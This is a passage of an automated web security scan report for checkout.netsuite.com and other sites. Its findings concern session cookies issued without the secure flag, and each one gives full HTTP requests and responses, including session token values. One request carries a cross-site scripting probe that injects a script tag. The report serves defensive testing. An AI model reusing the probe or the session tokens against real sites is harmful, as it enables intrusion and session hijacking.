https://checkout.netsuite.com/core/media/Netsparker3966cc21ff2a48c3b65f2ea6026a480e.nl
https://checkout.netsuite.com/core/media/Netsparkere27d76ce16c84ccb9270fd25e2ba9535.nl
https://checkout.netsuite.com/core/styles/Netsparker5d6e89379b044629864a1acadeba968b.nl
https://checkout.netsuite.com/core/styles/Netsparkera2b9f56d99bc43aa9ec216d3c99aa80b.nl
https://checkout.netsuite.com/core/styles/Netsparkerb8e355f2184b49a497b4b297f62d93f9.nl
https://checkout.netsuite.com/core/styles/pagestyles.nl
https://checkout.netsuite.com/pages/portal/css/main.css
https://checkout.netsuite.com/pages/portal/page_not_found.jsp
https://checkout.netsuite.com/s.nl
https://customer.kronos.com/Default.asp
https://employer.unicru.com/asp/home/login.asp
https://employer.unicru.com/asp/home/login.asp
https://employer.unicru.com/asp/home/login.asp
https://employer.unicru.com/asp/home/login.asp
https://hourly.deploy.com/hmc/report/
https://hourly.deploy.com/hmc/report/index.cfm
https://secure.trust-guard.com/
https://secure.trust-guard.com/ResetPassword.php
https://support.comodo.com/
https://support.trust-guard.com/
https://support.trust-guard.com/index.php
https://support.trust-guard.com/index.php
https://support.trust-guard.com/visitor/index.php
https://www.fusionvm.com/FusionVM/
https://checkout.netsuite.com/s
https://customer.kronos.com/Default.asp
https://customer.kronos.com/user/forgotpassword.asp
https://customer.kronos.com/user/forgotusername.asp
https://customer.kronos.com/user/logindenied.asp
https://support.comodo.com/index.php
https://support.comodo.com/index.php
https://support.trust-guard.com/index.php
https://support.trust-guard.com/visitor/

12.1. https://checkout.netsuite.com/Netsparker00c59262f08b40d59cb0f0d3fa4e17ed.nl previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	https://checkout.netsuite.com
Path:	/Netsparker00c59262f08b40d59cb0f0d3fa4e17ed.nl

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

JSESSIONID=L0xGN1TCcVCQPS8pHhg9qBGd76gpyCfS7FnHbzfnFl2LQNGjJvrzfh6fNyfBxr6h2LllvDnWDV1VRT3fh8GLJQYNFyskhxdG51gGXN5XF7N0GMrVt0mxL6vQyQSnT8pW!-979559123; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Netsparker00c59262f08b40d59cb0f0d3fa4e17ed.nl HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: checkout.netsuite.com
Cookie: JSESSIONID=dr9LN1Gcsnv0hQn9pSF9dZtY69V5GT6wWLx5pbn5zqyTN5K0By5hSnyCLpkp16zsn8jTQzcvVTNZSwMD4mG6WZmpmLChGK6FncvhBpQv6KGffqpM2fHyGlYVz2GpQM2Y!-979559123; NLVisitorId=rcHW8495AYoCDqLY; NLShopperId=rcHW8495AXICDie_; NS_VER=2011.1.0
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 206 Partial Content
Date: Mon, 25 Apr 2011 15:09:26 GMT
Server: Apache
Cache-Control: No-Cache
Pragma: No-Cache
Expires: 0
NS_RTIMER_COMPOSITE: -2144347290:616363742D6A6176613032302E7376616C652E6E65746C65646765722E636F6D:80
Set-Cookie: JSESSIONID=L0xGN1TCcVCQPS8pHhg9qBGd76gpyCfS7FnHbzfnFl2LQNGjJvrzfh6fNyfBxr6h2LllvDnWDV1VRT3fh8GLJQYNFyskhxdG51gGXN5XF7N0GMrVt0mxL6vQyQSnT8pW!-979559123; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Content-Type: text/html; charset=utf-8
Content-Length: 2024

<html><head><title>Notice</title>
<meta http-equiv='Content-Type' content='text/html; charset=UTF-8'>
<link rel='stylesheet' href='/core/styles/pagestyles.nl?ct=-2&bglt=F2F4F6&bgmd=EDF1F7&bgdk=737A82&
...[SNIP]...

12.2. https://checkout.netsuite.com/Netsparker3f4e2bee979c4108be6e7c378faf29fa.nl previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	https://checkout.netsuite.com
Path:	/Netsparker3f4e2bee979c4108be6e7c378faf29fa.nl

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

JSESSIONID=2RW7N1TCBHr6mQJSv4MJrzV9rnyz359DTygvK7qTzvf13vCc2x2x2JXm5QLhrNbJJQcTCgFLGHhsGp0VQ7FwRJ4b5TpDvcFrLL1Jh18S7vw1h5R7dYbgwShCL6v1QX0C!-979559123; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Netsparker3f4e2bee979c4108be6e7c378faf29fa.nl HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: checkout.netsuite.com
Cookie: JSESSIONID=dr9LN1Gcsnv0hQn9pSF9dZtY69V5GT6wWLx5pbn5zqyTN5K0By5hSnyCLpkp16zsn8jTQzcvVTNZSwMD4mG6WZmpmLChGK6FncvhBpQv6KGffqpM2fHyGlYVz2GpQM2Y!-979559123; NLVisitorId=rcHW8495AYoCDqLY; NLShopperId=rcHW8495AXICDie_; NS_VER=2011.1.0
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 206 Partial Content
Date: Mon, 25 Apr 2011 15:07:48 GMT
Server: Apache
Cache-Control: No-Cache
Pragma: No-Cache
Expires: 0
NS_RTIMER_COMPOSITE: 2000683563:616363742D6A6176613032302E7376616C652E6E65746C65646765722E636F6D:80
Set-Cookie: JSESSIONID=2RW7N1TCBHr6mQJSv4MJrzV9rnyz359DTygvK7qTzvf13vCc2x2x2JXm5QLhrNbJJQcTCgFLGHhsGp0VQ7FwRJ4b5TpDvcFrLL1Jh18S7vw1h5R7dYbgwShCL6v1QX0C!-979559123; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Content-Type: text/html; charset=utf-8
Content-Length: 2024

<html><head><title>Notice</title>
<meta http-equiv='Content-Type' content='text/html; charset=UTF-8'>
<link rel='stylesheet' href='/core/styles/pagestyles.nl?ct=-2&bglt=F2F4F6&bgmd=EDF1F7&bgdk=737A82&
...[SNIP]...

12.3. https://checkout.netsuite.com/Netsparkerd83f087f78ee474db97e8aec33de63c2.nl previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	https://checkout.netsuite.com
Path:	/Netsparkerd83f087f78ee474db97e8aec33de63c2.nl

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

JSESSIONID=6gtrN1TV8C9xXWGTLVWNMvDTBLMyV755hCYflZPh1YC9G3WhlHnpqmr03yRfTfPYQpX2lCD12TQ2p4sh2qzn2CRFHBYp2ypxXQ0Ts2HJkxK7TM4GT0WGNXlr2vhsWDqh!-979559123; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Netsparkerd83f087f78ee474db97e8aec33de63c2.nl HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: checkout.netsuite.com
Cookie: JSESSIONID=dr9LN1Gcsnv0hQn9pSF9dZtY69V5GT6wWLx5pbn5zqyTN5K0By5hSnyCLpkp16zsn8jTQzcvVTNZSwMD4mG6WZmpmLChGK6FncvhBpQv6KGffqpM2fHyGlYVz2GpQM2Y!-979559123; NLVisitorId=rcHW8495AYoCDqLY; NLShopperId=rcHW8495AXICDie_; NS_VER=2011.1.0
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 206 Partial Content
Date: Mon, 25 Apr 2011 15:10:47 GMT
Server: Apache
Cache-Control: No-Cache
Pragma: No-Cache
Expires: 0
NS_RTIMER_COMPOSITE: -110553779:616363742D6A6176613032302E7376616C652E6E65746C65646765722E636F6D:80
Set-Cookie: JSESSIONID=6gtrN1TV8C9xXWGTLVWNMvDTBLMyV755hCYflZPh1YC9G3WhlHnpqmr03yRfTfPYQpX2lCD12TQ2p4sh2qzn2CRFHBYp2ypxXQ0Ts2HJkxK7TM4GT0WGNXlr2vhsWDqh!-979559123; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Content-Type: text/html; charset=utf-8
Content-Length: 2024

<html><head><title>Notice</title>
<meta http-equiv='Content-Type' content='text/html; charset=UTF-8'>
<link rel='stylesheet' href='/core/styles/pagestyles.nl?ct=-2&bglt=F2F4F6&bgmd=EDF1F7&bgdk=737A82&
...[SNIP]...

12.4. https://checkout.netsuite.com/core/ previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	https://checkout.netsuite.com
Path:	/core/

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

JSESSIONID=hWd4N1GZGdsflwhjP8VdVGSnB6r2GzJ3SBh92hgS8gqlwWGNvByZJhtmP17wL8Hj9JwLc1dn5gjrrtXLMVZXhDnw7vvQwTP4mMBtPt3ds55G4vp4gF1Zr97r3DHpyLCR!-1220802186; path=/
NLShopperId=rcHW8495AXICDie_; domain=checkout.netsuite.com; expires=Monday, 02-May-2011 14:27:05 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /core/?nsextt=%00%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker(0x000013)%3C%2Fscript%3E HTTP/1.1
Referer: https://checkout.netsuite.com/core/styles/pagestyles.nl?ct=-2&bglt=F2F4F6&bgmd=EDF1F7&bgdk=737A82&bgon=5C7499&bgoff=AFB5BF&bgbar=5C7499&tasktitletext=E4EAF4&crumbtext=C4C8CF&headertext=B5C1D5&ontab=FFFFFF&offtab=000000&text=000000&link=000000&bgbody=FFFFFF&bghead=FFFFFF&portlet=C0CAD9&portletlabel=000000&bgbutton=FFE599&bgrequiredfld=FFFFE5&font=Verdana%2CHelvetica%2Csans-serif&size_site_content=9pt&size_site_title=9pt&size=1.0&nlinputstyles=T&NS_VER=2011.1.0&3
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: checkout.netsuite.com
Cookie: JSESSIONID=31PwN1GWQvkMGP2pxGGpgHN2m48g811ybT9HCcv4R2jvLCt8R9y21ywBzs7v4v6KSnRPhyDpZb218XYJ9jkhnLpJpr8m7pxCsyyXnPNz1ChxGGXdMyLzThLVm6jGBpVG!1490567172; NLVisitorId=rcHW8495AYoCDqLY; NLShopperId=rcHW8495AXICDie_; NS_VER=2011.1.0
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 14:27:05 GMT
Server: Apache
Cache-Control: No-Cache
Pragma: No-Cache
Expires: 0
NS_RTIMER_COMPOSITE: 333241087:616363742D6A6176613031312E7376616C652E6E65746C65646765722E636F6D:80
Set-Cookie: JSESSIONID=hWd4N1GZGdsflwhjP8VdVGSnB6r2GzJ3SBh92hgS8gqlwWGNvByZJhtmP17wL8Hj9JwLc1dn5gjrrtXLMVZXhDnw7vvQwTP4mMBtPt3ds55G4vp4gF1Zr97r3DHpyLCR!-1220802186; path=/
Set-Cookie: NLShopperId=rcHW8495AXICDie_; domain=checkout.netsuite.com; expires=Monday, 02-May-2011 14:27:05 GMT; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Content-Type: text/html; charset=utf-8
Content-Length: 2650

<html>
<head>
<title>Checkout</title>
<link rel='stylesheet' href='/core/styles/pagestyles.nl?ct=-2&bglt=F2F4F6&bgmd=EDF1F7&bgdk=737A82&bgon=5C7499&bgoff=AFB5BF&bgbar=5C7499&tasktitletext=E4EAF4&crum
...[SNIP]...

12.5. https://checkout.netsuite.com/core/media/Netsparker2f675cb9691f4d6caba2349e5f5a7d63.nl previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	https://checkout.netsuite.com
Path:	/core/media/Netsparker2f675cb9691f4d6caba2349e5f5a7d63.nl

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

JSESSIONID=9pncN1TcCnWLkfJJbLpSq1RR7PL6tyTTw0hR5QMhqLwnSDCyGTFJxJhYwyJYDpG2wJdSpSJy1FLV6lXT1thXwK1jrhJvlSP8KCMDHGZd8DVZ2nQZC2pLR3HTpPgQDCQp!-979559123; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /core/media/Netsparker2f675cb9691f4d6caba2349e5f5a7d63.nl HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: checkout.netsuite.com
Cookie: JSESSIONID=dr9LN1Gcsnv0hQn9pSF9dZtY69V5GT6wWLx5pbn5zqyTN5K0By5hSnyCLpkp16zsn8jTQzcvVTNZSwMD4mG6WZmpmLChGK6FncvhBpQv6KGffqpM2fHyGlYVz2GpQM2Y!-979559123; NLVisitorId=rcHW8495AYoCDqLY; NLShopperId=rcHW8495AXICDie_; NS_VER=2011.1.0
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 206 Partial Content
Date: Mon, 25 Apr 2011 15:08:12 GMT
Server: Apache
Cache-Control: No-Cache
Pragma: No-Cache
Expires: 0
NS_RTIMER_COMPOSITE: -368749109:616363742D6A6176613032302E7376616C652E6E65746C65646765722E636F6D:80
Set-Cookie: JSESSIONID=9pncN1TcCnWLkfJJbLpSq1RR7PL6tyTTw0hR5QMhqLwnSDCyGTFJxJhYwyJYDpG2wJdSpSJy1FLV6lXT1thXwK1jrhJvlSP8KCMDHGZd8DVZ2nQZC2pLR3HTpPgQDCQp!-979559123; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Content-Type: text/html; charset=utf-8
Content-Length: 2024

<html><head><title>Notice</title>
<meta http-equiv='Content-Type' content='text/html; charset=UTF-8'>
<link rel='stylesheet' href='/core/styles/pagestyles.nl?ct=-2&bglt=F2F4F6&bgmd=EDF1F7&bgdk=737A82&
...[SNIP]...

12.6. https://checkout.netsuite.com/core/media/Netsparker3966cc21ff2a48c3b65f2ea6026a480e.nl previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	https://checkout.netsuite.com
Path:	/core/media/Netsparker3966cc21ff2a48c3b65f2ea6026a480e.nl

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

JSESSIONID=JwDGN1TRX3qFJhPv0tBSnhLkTmpW34vhDRvgTkwqLXK4SnvMG3VM1xdGYpsFmKLXPJGL5yG5Lk8PK7KS4HKnfNNzcdJH2J9GRhFDsWdQlvhZyXNFZGnBbnGLKb2GLgXj!-979559123; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /core/media/Netsparker3966cc21ff2a48c3b65f2ea6026a480e.nl HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: checkout.netsuite.com
Cookie: JSESSIONID=dr9LN1Gcsnv0hQn9pSF9dZtY69V5GT6wWLx5pbn5zqyTN5K0By5hSnyCLpkp16zsn8jTQzcvVTNZSwMD4mG6WZmpmLChGK6FncvhBpQv6KGffqpM2fHyGlYVz2GpQM2Y!-979559123; NLVisitorId=rcHW8495AYoCDqLY; NLShopperId=rcHW8495AXICDie_; NS_VER=2011.1.0
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 206 Partial Content
Date: Mon, 25 Apr 2011 15:07:31 GMT
Server: Apache
Cache-Control: No-Cache
Pragma: No-Cache
Expires: 0
NS_RTIMER_COMPOSITE: -812652053:616363742D6A6176613032302E7376616C652E6E65746C65646765722E636F6D:80
Set-Cookie: JSESSIONID=JwDGN1TRX3qFJhPv0tBSnhLkTmpW34vhDRvgTkwqLXK4SnvMG3VM1xdGYpsFmKLXPJGL5yG5Lk8PK7KS4HKnfNNzcdJH2J9GRhFDsWdQlvhZyXNFZGnBbnGLKb2GLgXj!-979559123; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Content-Type: text/html; charset=utf-8
Content-Length: 2024

<html><head><title>Notice</title>
<meta http-equiv='Content-Type' content='te